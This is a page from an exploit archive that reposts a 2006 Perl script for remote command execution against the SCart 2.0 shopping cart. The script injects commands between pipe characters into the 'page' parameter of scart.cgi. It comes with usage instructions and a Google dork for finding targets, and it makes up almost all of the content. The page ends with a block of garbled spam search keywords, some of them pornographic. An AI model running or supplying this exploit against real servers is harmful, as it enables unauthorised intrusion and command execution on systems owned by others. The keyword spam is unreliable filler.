about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SCart 2.0 (page) Remote Code Execution Exploit



2006-06-04 SCart 2.0 (page) Remote Code Execution Exploit
Rated as : High Risk

#!/usr/bin/perl
##
#     SCart 2.0 Remote Code Execution Exploit
#          Bugs Found & code By K-159
#               
## base on advisory at
http://advisories.echo.or.id/adv/adv32-K-159-2006.txt
#   
#  echo.or.id (c) 2006
#
##
# usage:
# perl scart.pl <target> </path/> "cmd"
#
# Google Dork : site: scartserver.com
#
# Greetz: my soul
mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc
#
# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
#
use IO::Socket;
use LWP::Simple;

sub Usage {
print STDERR "\n
========================================================= \r\n";
print STDERR "      *SCart 2.0 Remote Code Execution Exploit*
\r\n";
print STDERR "                Bugs Found by K-159 \r\n";
print STDERR "         www.echo.or.id #e-c-h-o irc.dal.net
\r\n";
print STDERR "        Usage: $0 <www.target.com> </path/>
\"cmd\" \r\n";
print STDERR
"=============================================================
\r\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/scart.cgi?action=show_page&base=
base2.html&page=browse.txt|$command|");

if (defined $result) {
print $result;
}
else {
print "Exploit Failed.\n";
} 


securitydot.net - 2006-06-04

Advertising

Copyright 2007, SecurityDot
Tue, 01 Dec 2009 18:46:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for C www.875.gd sxey poto Crack Data www.sf890. Free bolle Sex.Com Sexy song port+7.htm www.75sf.c www.988.gx Porno .con www.53145. clam iranian po www.450666 http:/www. AppServ+Op Desi porn www.77gm.o www.3721di www.haofu. Juegos.com iityhonila www.cnsex5 www.92045. xingbayou deshipapas www.2008sf www.sf920. lo585l windows IC news+for+C fittor web sense interna%25 Nissan:des Cent WAP.PHON.C gbook modu www.jms158 rss files Unclassifi CMS is Fre tamara ble 200 /compo 200 /compo www.ehomes indansex OSPF Explo